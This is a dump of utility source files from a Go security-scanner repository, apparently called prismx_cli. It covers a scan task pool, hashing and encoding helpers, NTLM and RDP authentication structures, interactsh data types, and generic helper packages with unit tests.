https://raw.githubusercontent.com/yqcs/prismx/8b32e33639e031f38d6f9a4dee4b2a15fec1f13e/images/img.png
--------------------------------------------------------------------------------
/images/scan.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yqcs/prismx/8b32e33639e031f38d6f9a4dee4b2a15fec1f13e/images/scan.png
--------------------------------------------------------------------------------
/images/wx.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yqcs/prismx/8b32e33639e031f38d6f9a4dee4b2a15fec1f13e/images/wx.jpg
--------------------------------------------------------------------------------
/images/wx_qrcode.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yqcs/prismx/8b32e33639e031f38d6f9a4dee4b2a15fec1f13e/images/wx_qrcode.jpg
--------------------------------------------------------------------------------
/prismx_cli.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/scan/task.go:
--------------------------------------------------------------------------------
1 | package scan
2 |
3 | import (
4 | "github.com/panjf2000/ants/v2"
5 | "prismx_cli/core/models"
6 | "prismx_cli/utils/logger"
7 | "prismx_cli/utils/task"
8 | "time"
9 | )
10 |
11 | type TaskPool struct {
12 | Scan *task.Pool
13 | Params models.ScanParams
14 | HydraTask *models.HydraTask
15 | }
16 |
17 | func (t *TaskPool) NewPoolWithFunc(pool *task.Pool, invoke func(), function func(any)) {
18 | //任务函数
19 | pool.PoolWithFunc, _ = ants.NewPoolWithFunc(t.Params.Thread, func(i interface{}) {
20 | function(i)
21 | t.Scan.Wg.Done()
22 | })
23 | //任务下发函数
24 | invoke()
25 | //实体队列堵塞
26 | pool.Wg.Wait()
27 | //清除任务
28 | pool.PoolWithFunc.Release()
29 | }
30 |
31 | // Start 全部存活端口
32 | func (t *TaskPool) Start() {
33 | start := time.Now()
34 | //捕捉启动日志
35 | logger.Info(logger.Global.Color().Yellow("Start running scan task"))
36 | //任务堵塞流
37 | t.NewPoolWithFunc(t.Scan, t.TaskInChan, t.TaskFunc)
38 | //捕捉结束日志
39 | logger.Info(logger.Global.Color().Yellow("The task has ended, taking - " + time.Since(start).String()))
40 | }
41 |
--------------------------------------------------------------------------------
/utils/cryptoPlus/base64.go:
--------------------------------------------------------------------------------
1 | package cryptoPlus
2 |
3 | import (
4 | "encoding/base64"
5 | "prismx_cli/utils/logger"
6 | )
7 |
8 | // Base64Decode 解密
9 | func Base64Decode(str string) string {
10 | decoded, err := base64.StdEncoding.DecodeString(str)
11 | if err != nil {
12 | logger.Error(err.Error())
13 | return ""
14 | }
15 | return string(decoded)
16 | }
17 |
18 | // Base64Encode 加密
19 | func Base64Encode(str string) string {
20 | encoded := base64.StdEncoding.EncodeToString([]byte(str))
21 | return encoded
22 | }
23 |
--------------------------------------------------------------------------------
/utils/cryptoPlus/bcrypt.go:
--------------------------------------------------------------------------------
1 | package cryptoPlus
2 |
3 | import (
4 | "golang.org/x/crypto/bcrypt"
5 | "prismx_cli/utils/logger"
6 | )
7 |
8 | // ValidateBcryptPassWd 验证密码
9 | // 第一个参数是明文 第二个参数是密文
10 | func ValidateBcryptPassWd(src string, passWd string) bool {
11 | if err := bcrypt.CompareHashAndPassword([]byte(passWd), []byte(src)); err != nil {
12 | logger.Error(err.Error())
13 | return false
14 | }
15 | return true
16 | }
17 |
18 | // GeneratePassWd 生成密码
19 | func GeneratePassWd(src string) []byte {
20 | res, err := bcrypt.GenerateFromPassword([]byte(src), bcrypt.DefaultCost)
21 | if err != nil {
22 | logger.Error(err.Error())
23 | }
24 | return res
25 | }
26 |
--------------------------------------------------------------------------------
/utils/cryptoPlus/md5.go:
--------------------------------------------------------------------------------
1 | package cryptoPlus
2 |
3 | import (
4 | "crypto/md5"
5 | "fmt"
6 | "io"
7 | "prismx_cli/utils/logger"
8 | )
9 |
10 | func ToMD5(str string) string {
11 | m := md5.New()
12 | _, err := io.WriteString(m, str)
13 | if err != nil {
14 | logger.Error(err.Error())
15 | }
16 | arr := m.Sum(nil)
17 | return fmt.Sprintf("%x", arr)
18 | }
19 |
--------------------------------------------------------------------------------
/utils/cryptoPlus/sha256.go:
--------------------------------------------------------------------------------
1 | package cryptoPlus
2 |
3 | import (
4 | "crypto/hmac"
5 | "crypto/sha256"
6 | "encoding/hex"
7 | )
8 |
9 | func ToSha256(str, keyStr string) string {
10 | s := []byte(str)
11 | key := []byte(keyStr)
12 | m := hmac.New(sha256.New, key)
13 | m.Write(s)
14 | signature := hex.EncodeToString(m.Sum(nil))
15 | return signature
16 | }
17 |
18 | func SHA256Sum(data any) string {
19 | hash := sha256.New()
20 | if v, ok := data.([]byte); ok {
21 | hash.Write(v)
22 | } else if v, ok := data.(string); ok {
23 | hash.Write([]byte(v))
24 | } else {
25 | return ""
26 | }
27 |
28 | return hex.EncodeToString(hash.Sum(nil))
29 | }
30 |
--------------------------------------------------------------------------------
/utils/global.go:
--------------------------------------------------------------------------------
1 | package utils
2 |
3 | import (
4 | "prismx_cli/utils/arr"
5 | )
6 |
7 | const (
8 | DateFormat string = "2006-01-02 15:04:05"
9 | )
10 |
11 | // GlobalError 通用检查错误信息
12 | func GlobalError(err error) bool {
13 | if err == nil {
14 | return false
15 | }
16 | errs := []string{
17 | "closed by the remote host", "too many connections",
18 | "i/o timeout", "A connection attempt failed",
19 | "established connection failed", "connection attempt failed",
20 | "Unable to read", "is not allowed to connect to this",
21 | "no pg_hba.conf entry",
22 | "An existing connection was forcibly closed by the remote host",
23 | "No connection could be made",
24 | "local file '/etc/group' is not registered",
25 | "unexpected EOF",
26 | "invalid packet size",
27 | "bad connection",
28 | }
29 | return arr.IsContain(errs, err.Error())
30 | }
31 |
--------------------------------------------------------------------------------
/utils/go-ora/advanced_nego/ntlmssp/avids.go:
--------------------------------------------------------------------------------
1 | package ntlmssp
2 |
3 | type avID uint16
4 |
5 | const (
6 | avIDMsvAvEOL avID = iota
7 | avIDMsvAvNbComputerName
8 | avIDMsvAvNbDomainName
9 | avIDMsvAvDNSComputerName
10 | avIDMsvAvDNSDomainName
11 | avIDMsvAvDNSTreeName
12 | avIDMsvAvFlags
13 | avIDMsvAvTimestamp
14 | avIDMsvAvSingleHost
15 | avIDMsvAvTargetName
16 | avIDMsvChannelBindings
17 | )
18 |
--------------------------------------------------------------------------------
/utils/go-ora/advanced_nego/ntlmssp/messageheader.go:
--------------------------------------------------------------------------------
1 | package ntlmssp
2 |
3 | import (
4 | "bytes"
5 | )
6 |
7 | var signature = [8]byte{'N', 'T', 'L', 'M', 'S', 'S', 'P', 0}
8 |
9 | type messageHeader struct {
10 | Signature [8]byte
11 | MessageType uint32
12 | }
13 |
14 | func (h messageHeader) IsValid() bool {
15 | return bytes.Equal(h.Signature[:], signature[:]) &&
16 | h.MessageType > 0 && h.MessageType < 4
17 | }
18 |
19 | func newMessageHeader(messageType uint32) messageHeader {
20 | return messageHeader{signature, messageType}
21 | }
22 |
--------------------------------------------------------------------------------
/utils/go-ora/advanced_nego/ntlmssp/unicode.go:
--------------------------------------------------------------------------------
1 | package ntlmssp
2 |
3 | import (
4 | "bytes"
5 | "encoding/binary"
6 | "errors"
7 | "unicode/utf16"
8 | )
9 |
10 | // helper func's for dealing with Windows Unicode (UTF16LE)
11 |
12 | func fromUnicode(d []byte) (string, error) {
13 | if len(d)%2 > 0 {
14 | return "", errors.New("Unicode (UTF 16 LE) specified, but uneven data length")
15 | }
16 | s := make([]uint16, len(d)/2)
17 | err := binary.Read(bytes.NewReader(d), binary.LittleEndian, &s)
18 | if err != nil {
19 | return "", err
20 | }
21 | return string(utf16.Decode(s)), nil
22 | }
23 |
24 | func toUnicode(s string) []byte {
25 | uints := utf16.Encode([]rune(s))
26 | b := bytes.Buffer{}
27 | binary.Write(&b, binary.LittleEndian, &uints)
28 | return b.Bytes()
29 | }
30 |
--------------------------------------------------------------------------------
/utils/go-ora/advanced_nego/ntlmssp/varfield.go:
--------------------------------------------------------------------------------
1 | package ntlmssp
2 |
3 | import (
4 | "errors"
5 | )
6 |
7 | type varField struct {
8 | Len uint16
9 | MaxLen uint16
10 | BufferOffset uint32
11 | }
12 |
13 | func (f varField) ReadFrom(buffer []byte) ([]byte, error) {
14 | if len(buffer) < int(f.BufferOffset+uint32(f.Len)) {
15 | return nil, errors.New("Error reading data, varField extends beyond buffer")
16 | }
17 | return buffer[f.BufferOffset : f.BufferOffset+uint32(f.Len)], nil
18 | }
19 |
20 | func (f varField) ReadStringFrom(buffer []byte, unicode bool) (string, error) {
21 | d, err := f.ReadFrom(buffer)
22 | if err != nil {
23 | return "", err
24 | }
25 | if unicode { // UTF-16LE encoding scheme
26 | return fromUnicode(d)
27 | }
28 | // OEM encoding, close enough to ASCII, since no code page is specified
29 | return string(d), err
30 | }
31 |
32 | func newVarField(ptr *int, fieldsize int) varField {
33 | f := varField{
34 | Len: uint16(fieldsize),
35 | MaxLen: uint16(fieldsize),
36 | BufferOffset: uint32(*ptr),
37 | }
38 | *ptr += fieldsize
39 | return f
40 | }
41 |
--------------------------------------------------------------------------------
/utils/go-ora/advanced_nego/ntlmssp/version.go:
--------------------------------------------------------------------------------
1 | package ntlmssp
2 |
3 | // Version is a struct representing https://msdn.microsoft.com/en-us/library/cc236654.aspx
4 | type Version struct {
5 | ProductMajorVersion uint8
6 | ProductMinorVersion uint8
7 | ProductBuild uint16
8 | _ [3]byte
9 | NTLMRevisionCurrent uint8
10 | }
11 |
12 | // DefaultVersion returns a Version with "sensible" defaults (Windows 7)
13 | func DefaultVersion() Version {
14 | return Version{
15 | ProductMajorVersion: 6,
16 | ProductMinorVersion: 1,
17 | ProductBuild: 7601,
18 | NTLMRevisionCurrent: 15,
19 | }
20 | }
21 |
--------------------------------------------------------------------------------
/utils/go-ora/converters/max_len.go:
--------------------------------------------------------------------------------
1 | package converters
2 |
3 | var (
4 | // MAX_LEN_VARCHAR2 int = 0x7FFF
5 | // MAX_LEN_NVARCHAR2 = 0x7FFF
6 | // MAX_LEN_RAW = 0x7FFF
7 | MAX_LEN_BOOL = 0x2
8 | MAX_LEN_NUMBER = 0x16
9 | MAX_LEN_DATE = 0xB
10 | MAX_LEN_TIMESTAMP = 0xD
11 | )
12 |
--------------------------------------------------------------------------------
/utils/go-ora/transaction.go:
--------------------------------------------------------------------------------
1 | package go_ora
2 |
3 | import (
4 | "context"
5 | "database/sql/driver"
6 | )
7 |
8 | type Transaction struct {
9 | conn *Connection
10 | ctx context.Context
11 | }
12 |
13 | func (tx *Transaction) Commit() error {
14 | if tx.conn.State != Opened {
15 | return driver.ErrBadConn
16 | }
17 | tx.conn.autoCommit = true
18 | tx.conn.session.ResetBuffer()
19 | tx.conn.session.StartContext(tx.ctx)
20 | defer tx.conn.session.EndContext()
21 | return (&simpleObject{connection: tx.conn, operationID: 0xE}).exec()
22 | }
23 |
24 | func (tx *Transaction) Rollback() error {
25 | if tx.conn.State != Opened {
26 | return driver.ErrBadConn
27 | }
28 | tx.conn.autoCommit = true
29 | tx.conn.session.ResetBuffer()
30 | tx.conn.session.StartContext(tx.ctx)
31 | defer tx.conn.session.EndContext()
32 | return (&simpleObject{connection: tx.conn, operationID: 0xF}).exec()
33 | }
34 |
--------------------------------------------------------------------------------
/utils/go-rdp/core/types.go:
--------------------------------------------------------------------------------
1 | package core
2 |
3 | import "prismx_cli/utils/go-rdp/emission"
4 |
5 | type Transport interface {
6 | Read(b []byte) (n int, err error)
7 | Write(b []byte) (n int, err error)
8 | Close() error
9 |
10 | On(event, listener interface{}) *emission.Emitter
11 | Once(event, listener interface{}) *emission.Emitter
12 | Emit(event interface{}, arguments ...interface{}) *emission.Emitter
13 | }
14 |
15 | type FastPathListener interface {
16 | RecvFastPath(secFlag byte, s []byte)
17 | }
18 |
19 | type FastPathSender interface {
20 | SendFastPath(secFlag byte, s []byte) (int, error)
21 | }
22 |
--------------------------------------------------------------------------------
/utils/go-rdp/protocol/nla/encode.go:
--------------------------------------------------------------------------------
1 | package nla
2 |
3 | import (
4 | "crypto/hmac"
5 | "crypto/md5"
6 | "crypto/rc4"
7 | "strings"
8 |
9 | "golang.org/x/crypto/md4"
10 | "prismx_cli/utils/go-rdp/core"
11 | )
12 |
13 | func MD4(data []byte) []byte {
14 | h := md4.New()
15 | h.Write(data)
16 | return h.Sum(nil)
17 | }
18 |
19 | func MD5(data []byte) []byte {
20 | h := md5.New()
21 | h.Write(data)
22 | return h.Sum(nil)
23 | }
24 |
25 | func HMAC_MD5(key, data []byte) []byte {
26 | h := hmac.New(md5.New, key)
27 | h.Write(data)
28 | return h.Sum(nil)
29 | }
30 |
31 | // Version 2 of NTLM hash function
32 | func NTOWFv2(password, user, domain string) []byte {
33 | return HMAC_MD5(MD4(core.UnicodeEncode(password)), core.UnicodeEncode(strings.ToUpper(user)+domain))
34 | }
35 |
36 | // Same as NTOWFv2
37 | func LMOWFv2(password, user, domain string) []byte {
38 | return NTOWFv2(password, user, domain)
39 | }
40 |
41 | func RC4K(key, src []byte) []byte {
42 | result := make([]byte, len(src))
43 | rc4obj, _ := rc4.NewCipher(key)
44 | rc4obj.XORKeyStream(result, src)
45 | return result
46 | }
47 |
--------------------------------------------------------------------------------
/utils/httpResult/return.go:
--------------------------------------------------------------------------------
1 | package httpResult
2 |
3 | import (
4 | "github.com/gin-gonic/gin"
5 | "net/http"
6 | )
7 |
8 | type Resp struct {
9 | Status string `json:"status"` // 状态
10 | Code int `json:"code"` // 状态码
11 | Data any `json:"data"` // 数据集
12 | Message string `json:"message"` // 消息
13 | }
14 |
15 | // FAILURE 失败数据处理
16 | func FAILURE(c *gin.Context, code int, message string) {
17 | c.JSON(code, Resp{
18 | Code: code,
19 | Status: "failure",
20 | Message: message,
21 | Data: nil,
22 | })
23 | }
24 |
25 | // SUCCESS 通常成功数据处理
26 | func SUCCESS(c *gin.Context, data any) {
27 | c.JSON(http.StatusOK, Resp{
28 | Code: http.StatusOK,
29 | Data: data,
30 | Status: "success",
31 | Message: "请求成功",
32 | })
33 | }
34 |
--------------------------------------------------------------------------------
/utils/interactsh/pkg/options/session-info.go:
--------------------------------------------------------------------------------
1 | package options
2 |
3 | type SessionInfo struct {
4 | ServerURL string `yaml:"server-url"`
5 | Token string `yaml:"server-token"`
6 | PrivateKey string `yaml:"private-key"`
7 | CorrelationID string `yaml:"correlation-id"`
8 | SecretKey string `yaml:"secret-key"`
9 | PublicKey string `yaml:"public-key"`
10 | }
11 |
--------------------------------------------------------------------------------
/utils/interactsh/pkg/server/http_server.go:
--------------------------------------------------------------------------------
1 | package server
2 |
3 | // RegisterRequest is a request for client registration to interactsh server.
4 | type RegisterRequest struct {
5 | // PublicKey is the public RSA Key of the client.
6 | PublicKey string `json:"public-key"`
7 | // SecretKey is the secret-key for correlation ID registered for the client.
8 | SecretKey string `json:"secret-key"`
9 | // CorrelationID is an ID for correlation with requests.
10 | CorrelationID string `json:"correlation-id"`
11 | }
12 |
13 | // DeregisterRequest is a request for client deregistration to interactsh server.
14 | type DeregisterRequest struct {
15 | // CorrelationID is an ID for correlation with requests.
16 | CorrelationID string `json:"correlation-id"`
17 | // SecretKey is the secretKey for the interactsh client.
18 | SecretKey string `json:"secret-key"`
19 | }
20 |
21 | // PollResponse is the response for a polling request
22 | type PollResponse struct {
23 | Data []string `json:"data"`
24 | Extra []string `json:"extra"`
25 | AESKey string `json:"aes_key"`
26 | TLDData []string `json:"tlddata,omitempty"`
27 | }
28 |
--------------------------------------------------------------------------------
/utils/interactsh/pkg/server/util.go:
--------------------------------------------------------------------------------
1 | package server
2 |
3 | import (
4 | "strings"
5 |
6 | "github.com/asaskevich/govalidator"
7 | "github.com/rs/xid"
8 | )
9 |
10 | func (options *Options) isCorrelationID(s string) bool {
11 | if len(s) == options.GetIdLength() && govalidator.IsAlphanumeric(s) {
12 | // xid should be 12
13 | if options.CorrelationIdLength != 12 {
14 | return true
15 | } else if _, err := xid.FromString(strings.ToLower(s[:options.CorrelationIdLength])); err == nil {
16 | return true
17 | }
18 | }
19 | return false
20 | }
21 |
--------------------------------------------------------------------------------
/utils/interactsh/pkg/storage/error.go:
--------------------------------------------------------------------------------
1 | package storage
2 |
3 | import "errors"
4 |
5 | var ErrCorrelationIdNotFound = errors.New("could not get correlation-id from cache")
6 |
--------------------------------------------------------------------------------
/utils/interactsh/pkg/storage/storage.go:
--------------------------------------------------------------------------------
1 | // storage defines a storage mechanism
2 | package storage
3 |
4 | type Storage interface {
5 | GetCacheMetrics() (*CacheMetrics, error)
6 | SetIDPublicKey(correlationID, secretKey, publicKey string) error
7 | SetID(ID string) error
8 | AddInteraction(correlationID string, data []byte) error
9 | AddInteractionWithId(id string, data []byte) error
10 | GetInteractions(correlationID, secret string) ([]string, string, error)
11 | GetInteractionsWithId(id string) ([]string, error)
12 | RemoveID(correlationID, secret string) error
13 | GetCacheItem(token string) (*CorrelationData, error)
14 | Close() error
15 | }
16 |
--------------------------------------------------------------------------------
/utils/interactsh/pkg/storage/types.go:
--------------------------------------------------------------------------------
1 | package storage
2 |
3 | import (
4 | "sync"
5 | "time"
6 | )
7 |
8 | type GetInteractionsFunc func() []string
9 |
10 | type CacheMetrics struct {
11 | HitCount uint64 `json:"hit-count"`
12 | MissCount uint64 `json:"miss-count"`
13 | LoadSuccessCount uint64 `json:"load-success-count"`
14 | LoadErrorCount uint64 `json:"load-error-count"`
15 | TotalLoadTime time.Duration `json:"total-load-time"`
16 | EvictionCount uint64 `json:"eviction-count"`
17 | }
18 |
19 | // CorrelationData is the data for a correlation-id.
20 | type CorrelationData struct {
21 | sync.Mutex
22 | // data contains data for a correlation-id in AES encrypted json format.
23 | Data []string `json:"data"`
24 | // secretkey is a secret key for original user verification
25 | SecretKey string `json:"-"`
26 | // AESKey is the AES encryption key in encrypted format.
27 | AESKeyEncrypted string `json:"aes-key"`
28 | // decrypted AES key for signing
29 | AESKey []byte `json:"-"`
30 | }
31 |
--------------------------------------------------------------------------------
/utils/netUtils/body.go:
--------------------------------------------------------------------------------
1 | package netUtils
2 |
3 | import (
4 | "bytes"
5 | "io"
6 | "net/http"
7 | )
8 |
9 | // CopyRespBody 无损取Body
10 | func CopyRespBody(resp *http.Response) []byte {
11 | //复制一份body
12 | if resp != nil && resp.Body != nil {
13 | bodyBytes, _ := io.ReadAll(resp.Body)
14 | //返还
15 | resp.Body = io.NopCloser(bytes.NewBuffer(bodyBytes))
16 | return bodyBytes
17 | }
18 | return nil
19 | }
20 |
21 | // CopyReqBody 无损取request
22 | func CopyReqBody(req *http.Request) []byte {
23 | if req.Body != nil {
24 | data, err := io.ReadAll(req.Body)
25 | if err != nil {
26 | return nil
27 | }
28 | // bind之前把body写回去
29 | req.Body = io.NopCloser(bytes.NewBuffer(data))
30 | return data
31 | }
32 | return nil
33 | }
34 |
--------------------------------------------------------------------------------
/utils/putils/async/async.go:
--------------------------------------------------------------------------------
1 | package async
2 |
3 | import "context"
4 |
5 | // Future mimics the async/await paradigm
6 | type Future[T any] interface {
7 | Await() (T, error)
8 | }
9 |
10 | type future[T any] struct {
11 | await func(ctx context.Context) (T, error)
12 | }
13 |
14 | func (f future[T]) Await() (T, error) {
15 | return f.await(context.Background())
16 | }
17 |
18 | func Exec[T any](f func() (T, error)) Future[T] {
19 | var (
20 | result T
21 | err error
22 | )
23 | c := make(chan struct{})
24 | go func() {
25 | defer close(c)
26 |
27 | result, err = f()
28 | }()
29 | return future[T]{
30 | await: func(ctx context.Context) (T, error) {
31 | select {
32 | case <-ctx.Done():
33 | return result, ctx.Err()
34 | case <-c:
35 | return result, err
36 | }
37 | },
38 | }
39 | }
40 |
--------------------------------------------------------------------------------
/utils/putils/async/async_test.go:
--------------------------------------------------------------------------------
1 | package async
2 |
3 | import (
4 | "testing"
5 | "time"
6 |
7 | "github.com/stretchr/testify/require"
8 | )
9 |
10 | func TestAsync(t *testing.T) {
11 | // Async
12 | do := Exec(func() (bool, error) {
13 | time.Sleep(2 * time.Second)
14 | return true, nil
15 | })
16 |
17 | // do some other stuff
18 | time.Sleep(time.Second)
19 |
20 | // Await
21 | ok, err := do.Await()
22 | require.Nil(t, err)
23 | require.True(t, ok)
24 | }
25 |
--------------------------------------------------------------------------------
/utils/putils/batcher/doc.go:
--------------------------------------------------------------------------------
1 | // batcher is a package that provides a simple batching mechanism
2 | // the buffer can be configured with a max capacity and a flush interval
3 | // the buffer will invoke a callback function when the buffer is full or the flush interval is reached
4 | package batcher
5 |
--------------------------------------------------------------------------------
/utils/putils/buffer/disk.go:
--------------------------------------------------------------------------------
1 | package buffer
2 |
3 | import (
4 | "io"
5 | "os"
6 | )
7 |
8 | type DiskBuffer struct {
9 | f *os.File
10 | }
11 |
12 | func New() (*DiskBuffer, error) {
13 | f, err := os.CreateTemp("", "")
14 | if err != nil {
15 | return nil, err
16 | }
17 |
18 | return &DiskBuffer{f: f}, nil
19 | }
20 |
21 | func (db *DiskBuffer) Write(b []byte) (int, error) {
22 | return db.f.Write(b)
23 | }
24 |
25 | func (db *DiskBuffer) WriteAt(b []byte, off int64) (int, error) {
26 | return db.f.WriteAt(b, off)
27 | }
28 |
29 | func (db *DiskBuffer) WriteString(s string) (int, error) {
30 | return db.f.WriteString(s)
31 | }
32 |
33 | func (db *DiskBuffer) Bytes() ([]byte, error) {
34 | return os.ReadFile(db.f.Name())
35 | }
36 |
37 | func (db *DiskBuffer) String() (string, error) {
38 | data, err := db.Bytes()
39 | return string(data), err
40 | }
41 |
42 | // all readers must be closed to avoid FD leak
43 | func (db *DiskBuffer) Reader() (io.ReadSeekCloser, error) {
44 | f, err := os.Open(db.f.Name())
45 | return f, err
46 | }
47 |
48 | func (db *DiskBuffer) Close() {
49 | name := db.f.Name()
50 | db.f.Close()
51 | os.RemoveAll(name)
52 | }
53 |
--------------------------------------------------------------------------------
/utils/putils/channelutil/utils.go:
--------------------------------------------------------------------------------
1 | package channelutil
2 |
3 | // CreateNChannels creates and returns N channels
4 | func CreateNChannels[T any](count int, bufflen int) map[int]chan T {
5 | x := map[int]chan T{}
6 |
7 | for i := 0; i < count; i++ {
8 | x[i] = make(chan T, bufflen)
9 | }
10 | return x
11 | }
12 |
--------------------------------------------------------------------------------
/utils/putils/conn/connpool/inflight.go:
--------------------------------------------------------------------------------
1 | package connpool
2 |
3 | import (
4 | "errors"
5 | "net"
6 |
7 | "go.uber.org/multierr"
8 | mapsutil "prismx_cli/utils/putils/maps"
9 | )
10 |
11 | type InFlightConns struct {
12 | inflightConns *mapsutil.SyncLockMap[net.Conn, struct{}]
13 | }
14 |
15 | func NewInFlightConns() (*InFlightConns, error) {
16 | m := &mapsutil.SyncLockMap[net.Conn, struct{}]{
17 | Map: mapsutil.Map[net.Conn, struct{}]{},
18 | }
19 | return &InFlightConns{inflightConns: m}, nil
20 | }
21 |
22 | func (i *InFlightConns) Add(conn net.Conn) {
23 | _ = i.inflightConns.Set(conn, struct{}{})
24 | }
25 |
26 | func (i *InFlightConns) Remove(conn net.Conn) {
27 | i.inflightConns.Delete(conn)
28 | }
29 |
30 | func (i *InFlightConns) Close() error {
31 | var errs []error
32 |
33 | _ = i.inflightConns.Iterate(func(conn net.Conn, _ struct{}) error {
34 | if err := conn.Close(); err != nil {
35 | errs = append(errs, err)
36 | }
37 | return nil
38 | })
39 |
40 | if ok := i.inflightConns.Clear(); !ok {
41 | errs = append(errs, errors.New("couldn't empty in flight connections"))
42 | }
43 |
44 | return multierr.Combine(errs...)
45 | }
46 |
--------------------------------------------------------------------------------
/utils/putils/consts/errors.go:
--------------------------------------------------------------------------------
1 | package consts
2 |
3 | import "errors"
4 |
5 | var (
6 | ErrNotSupported = errors.New("not supported")
7 | )
8 |
--------------------------------------------------------------------------------
/utils/putils/context/context.go:
--------------------------------------------------------------------------------
1 | package contextutil
2 |
3 | import (
4 | "context"
5 | "errors"
6 | )
7 |
8 | var ErrIncorrectNumberOfItems = errors.New("number of items is not even")
9 |
10 | var DefaultContext = context.TODO()
11 |
12 | type ContextArg string
13 |
14 | // WithValues combines multiple key-value into an existing context
15 | func WithValues(ctx context.Context, keyValue ...ContextArg) (context.Context, error) {
16 | if len(keyValue)%2 != 0 {
17 | return ctx, ErrIncorrectNumberOfItems
18 | }
19 |
20 | for i := 0; i < len(keyValue)-1; i++ {
21 | ctx = context.WithValue(ctx, keyValue[i], keyValue[i+1]) //nolint
22 | }
23 | return ctx, nil
24 | }
25 |
26 | // ValueOrDefault returns default context if given is nil (using interface to avoid static check reporting)
27 | func ValueOrDefault(value interface{}) context.Context {
28 | if ctx, ok := value.(context.Context); ok && ctx != nil {
29 | return ctx
30 | }
31 |
32 | return DefaultContext
33 | }
34 |
--------------------------------------------------------------------------------
/utils/putils/conversion/conversion.go:
--------------------------------------------------------------------------------
1 | package conversion
2 |
3 | import "unsafe"
4 |
5 | func Bytes(s string) []byte {
6 | return unsafe.Slice(unsafe.StringData(s), len(s))
7 | }
8 |
9 | func String(b []byte) string {
10 | if len(b) == 0 {
11 | return ""
12 | }
13 | return unsafe.String(unsafe.SliceData(b), len(b))
14 | }
15 |
--------------------------------------------------------------------------------
/utils/putils/conversion/conversion_test.go:
--------------------------------------------------------------------------------
1 | package conversion
2 |
3 | import (
4 | "bytes"
5 | "testing"
6 | )
7 |
8 | func TestBytes(t *testing.T) {
9 | testCases := []struct {
10 | input string
11 | expected []byte
12 | }{
13 | {"test", []byte("test")},
14 | {"", []byte("")},
15 | }
16 |
17 | for _, tc := range testCases {
18 | result := Bytes(tc.input)
19 | if !bytes.Equal(result, tc.expected) {
20 | t.Errorf("Expected %v, but got %v", tc.expected, result)
21 | }
22 | }
23 | }
24 |
25 | func TestString(t *testing.T) {
26 | testCases := []struct {
27 | input []byte
28 | expected string
29 | }{
30 | {[]byte("test"), "test"},
31 | {[]byte(""), ""},
32 | }
33 |
34 | for _, tc := range testCases {
35 | result := String(tc.input)
36 | if result != tc.expected {
37 | t.Errorf("Expected %s, but got %s", tc.expected, result)
38 | }
39 | }
40 | }
41 |
--------------------------------------------------------------------------------
/utils/putils/crypto/README.md:
--------------------------------------------------------------------------------
1 | # cryptoutil
2 | The package contains various helpers about crypto
--------------------------------------------------------------------------------
/utils/putils/crypto/hash.go:
--------------------------------------------------------------------------------
1 | package cryptoutil
2 |
3 | import (
4 | "crypto/sha256"
5 | "encoding/hex"
6 | )
7 |
8 | func SHA256Sum(data interface{}) string {
9 | hasher := sha256.New()
10 | if v, ok := data.([]byte); ok {
11 | hasher.Write(v)
12 | } else if v, ok := data.(string); ok {
13 | hasher.Write([]byte(v))
14 | } else {
15 | return ""
16 | }
17 |
18 | return hex.EncodeToString(hasher.Sum(nil))
19 | }
20 |
--------------------------------------------------------------------------------
/utils/putils/crypto/hash_test.go:
--------------------------------------------------------------------------------
1 | package cryptoutil
2 |
3 | import (
4 | "testing"
5 |
6 | "github.com/stretchr/testify/require"
7 | )
8 |
9 | func TestSHA256Sum(t *testing.T) {
10 | tests := map[string]string{
11 | "test": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08",
12 | "test1": "1b4f0e9851971998e732078544c96b36c3d01cedf7caa332359d6f1d83567014",
13 | }
14 | for item, hash := range tests {
15 | require.Equal(t, hash, SHA256Sum(item), "hash is different")
16 | }
17 | }
18 |
--------------------------------------------------------------------------------
/utils/putils/dedupe/leveldb.go:
--------------------------------------------------------------------------------
1 | package dedupe
2 |
3 | import (
4 | "prismx_cli/utils/hmap/store/hybrid"
5 | )
6 |
7 | type LevelDBBackend struct {
8 | storage *hybrid.HybridMap
9 | }
10 |
11 | func NewLevelDBBackend() *LevelDBBackend {
12 | l := &LevelDBBackend{}
13 | db, err := hybrid.New(hybrid.DefaultDiskOptions)
14 | if err != nil {
15 | }
16 | l.storage = db
17 | return l
18 | }
19 |
20 | func (l *LevelDBBackend) Upsert(elem string) bool {
21 | _, exists := l.storage.Get(elem)
22 | if exists {
23 | return false
24 | }
25 |
26 | if err := l.storage.Set(elem, nil); err != nil {
27 | return false
28 | }
29 | return true
30 | }
31 |
32 | func (l *LevelDBBackend) IterCallback(callback func(elem string)) {
33 | l.storage.Scan(func(k, _ []byte) error {
34 | callback(string(k))
35 | return nil
36 | })
37 | }
38 |
39 | func (l *LevelDBBackend) Cleanup() {
40 | _ = l.storage.Close()
41 | }
42 |
--------------------------------------------------------------------------------
/utils/putils/dedupe/map.go:
--------------------------------------------------------------------------------
1 | package dedupe
2 |
3 | import "runtime/debug"
4 |
5 | type MapBackend struct {
6 | storage map[string]struct{}
7 | }
8 |
9 | func NewMapBackend() *MapBackend {
10 | return &MapBackend{storage: map[string]struct{}{}}
11 | }
12 |
13 | func (m *MapBackend) Upsert(elem string) bool {
14 | if _, exists := m.storage[elem]; exists {
15 | return false
16 | }
17 | m.storage[elem] = struct{}{}
18 | return true
19 | }
20 |
21 | func (m *MapBackend) IterCallback(callback func(elem string)) {
22 | for k := range m.storage {
23 | callback(k)
24 | }
25 | }
26 |
27 | func (m *MapBackend) Cleanup() {
28 | m.storage = nil
29 | // By default GC doesnot release buffered/allocated memory
30 | // since there always is possibilitly of needing it again/immediately
31 | // and releases memory in chunks
32 | // debug.FreeOSMemory forces GC to release allocated memory at once
33 | debug.FreeOSMemory()
34 | }
35 |
--------------------------------------------------------------------------------
/utils/putils/errors/err_with_fmt.go:
--------------------------------------------------------------------------------
1 | package errorutil
2 |
3 | import (
4 | "fmt"
5 | )
6 |
7 | // ErrWithFmt is a simplified version of err holding a default format
8 | type ErrWithFmt struct {
9 | fmt string
10 | }
11 |
12 | // Wrapf wraps given message
13 | func (e *ErrWithFmt) Msgf(args ...any) error {
14 | return fmt.Errorf(e.fmt, args...)
15 | }
16 |
17 | func (e *ErrWithFmt) Error() {
18 | panic("ErrWithFmt is a format holder")
19 | }
20 |
